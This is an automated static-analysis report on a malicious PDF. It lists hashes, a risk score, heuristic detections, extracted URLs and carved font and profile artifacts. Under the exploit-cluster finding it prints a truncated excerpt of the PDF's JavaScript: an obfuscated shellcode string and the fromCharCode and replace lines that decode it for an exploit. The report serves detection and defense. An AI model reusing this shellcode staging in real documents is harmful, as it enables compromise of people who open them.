Malicious PDF — malware analysis report

Static analysis result for SHA-256 e50d4dd1c2b707f7…

MALICIOUS

PDF

1.70 MB Created: 2010-08-10 16:09:27 +08:00 Authoring application: Foxit PDF Creator Version 3.0.2.0506 First seen: 2026-05-10
MD5: 4098d427ee180c5d68f1dd87273d3f30 SHA-1: d7609e50b859c2b2d01ab445a4452363e3651010 SHA-256: e50d4dd1c2b707f7295aad6ddd4f342476460aa4787f43b0304d39d5eeb9d1a5
86 Risk Score

Machine Learning

  • Nyx PDF Classifier suspicious score 0.4319

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var forme1 = "@2deb@8358@04c0@c933@088b@9090@3390@33f6@8bff@83f0@0cc6@fe8b@3366@66d2@168b@d632@1788@c683@8302@01c7@e983@e301@eb17@e8e9@ffce@ffff@9090@9090@150b@0005@9090@9090@9090@9090@d184@71fa@fd11@30b1@26ca@3a3a@5d55@7a7a@1212@1175@04a5@c7f7@eaea@0707@4c4c@5dd6@0646@c8c4@e962@1c6c@a0bc@1eb3@56dd@7737@030b@cf46@4207@c73b@dd56@cd1d@bb30@7a38@4e72@6ee5@104c@ccce@c5bd@6467@d40e@129b@96cb@f60e@9e15@0942@9880@d853@7d26@af8f@b8bb@ef35@e3aa@0a81@685c@840f@7073@e095@778b@ae16@7b3c@9ffa@5e2a@90c0@93aa@ …
var asT = String.fromCharCode(37,117);
var forme2 = forme1.replace(/@/g,asT);
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.monotype.comMonotype Referenced by PDF JavaScript
    • http://www.foxitsoftware.comReferenced by PDF JavaScript
    • http://www.monotype.com/html/mtname/ms_timesnewroman.htmlhttp://www.monotype.com/html/mtname/ms_welcome.htmlhttp://www.monotype.com/html/type/license.htmlReferenced by PDF JavaScript
    • http://www.microsoft.com/truetype/fonts/wingdings/http://www.microsoft.com/truetype/designers/bandh/Referenced by PDF JavaScript
    • http://www.monotype.com/html/mtname/ms_arial.htmlhttp://www.monotype.com/html/mtname/ms_welcome.htmlhttp://www.monotype.com/html/type/license.htmlReferenced by PDF JavaScript
    • http://www.iec.chIn PDF document text

Extracted artifacts 7

Files carved from inside the sample during analysis.

FilenameKindSourceSize
icc_00_off000000b2.icc pdf-icc-profile PDF ICC profile at offset 0xB2 3144 bytes
SHA-256: 2b3aa1645779a9e634744faf9b01e9102b0c9b88fd6deced7934df86b949af7e
font_00_sfnt_off00000c2b.bin pdf-font-stream PDF embedded font (sfnt) at offset 0xC2B 34872 bytes
SHA-256: 83831dd521463c628ccf5326b2691f9f9e831e8babc26932321a4a5f7124936e
font_01_sfnt_off000065d1.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x65D1 52748 bytes
SHA-256: f27c297b9da0fead241168e20fba12b6892f2a4a6ac5a1901a54f733a4b106cc
font_02_sfnt_off0000f28d.bin pdf-font-stream PDF embedded font (sfnt) at offset 0xF28D 9696 bytes
SHA-256: c869b49ceacdf99ae46dab3f76366706417a1d101856a104145e0440ad292ba1
font_03_sfnt_off00010695.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x10695 13336 bytes
SHA-256: 7d830b325f869950ddfd01daa675f402578dd99a87d67862120e347535416ab7
font_04_sfnt_off000123b3.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x123B3 29592 bytes
SHA-256: 3fa2cf1f95426906a95a6a9761c7eb9385ce6c6c5aaac164bd1e6da2fb1c9e67
font_05_sfnt_off00018263.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x18263 15484 bytes
SHA-256: f17dc23034f5d7335316bcceb62cc449fc05a4fcee4619c6dffc237c268b5f2e

Open this report in the interactive analyzer, or submit your own file for analysis.